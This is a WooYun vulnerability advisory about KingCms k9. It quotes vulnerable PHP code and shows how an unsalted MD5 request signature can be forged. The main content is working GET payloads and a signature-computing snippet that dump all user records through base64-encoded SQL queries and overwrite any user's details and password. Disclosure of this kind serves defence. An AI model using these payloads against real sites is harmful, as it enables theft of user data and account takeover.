当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102489

漏洞标题:KingCms最新版(k9)查看、修改所有用户所有信息

相关厂商:KingCms

漏洞作者: 路人甲

提交时间:2015-03-20 17:37

修复时间:2015-05-04 17:38

公开时间:2015-05-04 17:38

漏洞类型:非授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

KingCms最新版(k9)查看、修改所有用户所有信息

详细说明:

朋友的公司想购买kingcms的授权,让我帮忙看下。发现kingcms很长一段时间没更新了,憋了一段时间放出了最新版的k9,官网下下来学习一下。
在wooyun上看到了几个漏洞,如: WooYun: kingcms最新版sql注入漏洞
这里越权涉及到两个方面。
0x00:先来看看如果查看所有会员信息。
问题文件在/api/conn.php

$get=$_GET;
if(empty($get['jsoncallback'])) exit('非法提交!');
$jsoncallback=$_GET['jsoncallback'];
if(empty($_GET['USERID'])) exit($jsoncallback.'('.json_encode(array('error'=>"用户ID不能为空,请求失败!")).')');
$str=new str;
$db=new db;
$file=new file;
if(empty($get['SIGN'])) exit($jsoncallback.'('.json_encode(array('error'=>'丢失密文,禁止解析!')).')');
//验证权限
$sign=$get['SIGN'];
unset($get['SIGN'],$get['_'],$get['jsoncallback']);
$arr=array();
foreach($get as $key => $val){
	$arr[$key]=$key.'='.urlencode($val);
}
ksort($arr);
$param=implode('&',$arr);
$sign1=md5($param.kc_config('system.salt'));
if($sign!=$sign1) exit($jsoncallback.'('.json_encode(array('error'=>'审核失败,数据不一致!')).')');
$arr=array();
$get=array_map('base64_decode',$get);
foreach($get as $key=>$val){
	if(substr($key,0,8)=='data_one'){
		$arr[$key]=$db->get_one($val);
	}elseif(substr($key,0,4)=='data'){
		$arr[$key]=$db->get($val);
	}elseif(substr($key,0,5)=='count'){
		$res=$db->get($val);
		$arr[$key]=empty($res[0]['c']) ? 0 : $res[0]['c'];
	}elseif(substr($key,0,5)=='newid'){
		list($table,$id)=explode('|',$val,2);
		$arr[$key]=$db->newid($table,'',$id);
	}elseif(substr($key,0,6)=='getdir'){
		list($path,$filetype)=explode('|',$val,2);
		if(empty($filetype)) $filetype='*';
		$arr[$key]=$file->getDir($path,$filetype);
	}elseif(substr($key,0,7)=='getfile'){
		$arr[$key]=$file->get($val);
	}elseif(substr($key,0,6)=='config'){
		$arr[$key]=kc_config($val);
	}elseif(substr($key,0,6)=='isfile'){
		$arr[$key]=is_file(ROOT.$val)?1:0;
	}
}


首先要绕过上面代码中的权限判断,其实就是计算出$sign1,然后使$_GET[‘SIGN’]与之相等即可。来看看$sign1是如何计算出来的

foreach($get as $key => $val){
	$arr[$key]=$key.'='.urlencode($val);	
}
ksort($arr);
$param=implode('&',$arr);
$sign1=md5($param.kc_config('system.salt'));


参与计算的参数只有kc_config('system.salt')不是用户输入的,但是kingcms的这个参数是空,此因所有参与计算的参数都是用户输入的,按上面的算法简单计算一下就知道$sign1了,然后输入的$_GET[‘SIGN’]等于$sign1即可绕过权限判断。
然后就执行了数据库查询并把查到的用户信息显示了出来。
Paload(GET提交):

/api/conn.php?USERID=MTAwMDA%3D&data=U0VMRUNUICogRlJPTSBraW5nX3VzZXIgIFdIRVJFIHVzZXJpZD0xMDAwNA%3D%3D&data_group=U0VMRUNUIGdpZCxncm91cG5hbWUsbm90ZXMgRlJPTSBraW5nX3VzZXJfZ3JvdXAg&data_group_bind=U0VMRUNUIGdpZCxyZW1vdmVkYXRlIEZST00ga2luZ191c2VyX2dyb3VwX2JpbmQgIFdIRVJFIHVzZXJpZD0xMDAwNA%3D%3D&data_role=U0VMRUNUIHJpZCxyb2xlbmFtZSxub3RlcyBGUk9NIGtpbmdfdXNlcl9yb2xlIA%3D%3D&data_role_bind=U0VMRUNUIHJpZCxyZW1vdmVkYXRlIEZST00ga2luZ191c2VyX3JvbGVfYmluZCAgV0hFUkUgdXNlcmlkPTEwMDA0&jsoncallback=j&SIGN=a9b456412499e56d335b7b340198b957&_=1426775906734


上面的参数是经过base64编码的,如上面的参数data的value解码以后是SELECT * FROM king_user WHERE userid=10004,通过构造sql语句(修改userid的值,遍历即可),base64编码以后提交,就可以查询所有会员的信息了。如下图

查看副本.jpg


0x01:下面看看如何修改所有会员的各种信息。
/user/manage.php

无关代码
$array=array(
		'name'=>$_POST['name'],
		'tel'=>$_POST['tel'],
		'email'=>$_POST['email'],
		'qq'=>$_POST['qq'],
		'address'=>$_POST['address'],
		'qianming'=>$_POST['qianming'],		
	);
	
	if(!empty($_POST['userpass'])) $array['userpass']=md5($_POST['userpass']);
	if(empty($userid)){
		$array['username']=$_POST['username'];
		$array['regdate']=TIME;
		$array['date']=TIME;
		$array['regip']=$str->ip();
		$array['ip']=$str->ip();
		$userid=$db->insert('%s_user',$array);
		kc_log(array('userid'=>$u->info['userid'],'app'=>'user','action'=>'USER_NEW','cid'=>$userid));
	}else{
		$db->update('%s_user',$array,'userid='.$userid);
		$db->delete('%s_user_group_bind','userid='.$userid);
		$db->delete('%s_user_role_bind','userid='.$userid);
		kc_log(array('userid'=>$u->info['userid'],'app'=>'user','action'=>'USER_EDIT','cid'=>$userid));
	}
无关代码


当userid不为空时,就会用提交的内容把该userid对应的用户信息修改,而userid是用户直接提交的。
Payload(get提交):

/user/manage.php?jsoncallback=1&_=1&CMD=edit&&METHOD=POST&userid=10004&AJAX=1&USERID=10000&SIGN=89ee81f5f1f328f555ceb7e7655d9f2f&username=test&userpass=test&userpass1=test&role_removedate1=&group_removedate2=&group_removedate3=&group_removedate4=&name=%E6%B5%8B%E8%AF%95&tel=13500000000&email=test%40163.com&qq=1111&address=123&qianming=


其中userid是你要修改的用户的id,可以遍历,参数SIGN是这样计算出来的

<?php
$str="10000";//10000即POST参数中的USERID
$str.="kingcms.com";//网站域名
$SIGN=md5($str);
?>


过程见下图

修改副本.jpg

漏洞证明:

见 详细说明

修复方案:

加强权限验证

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝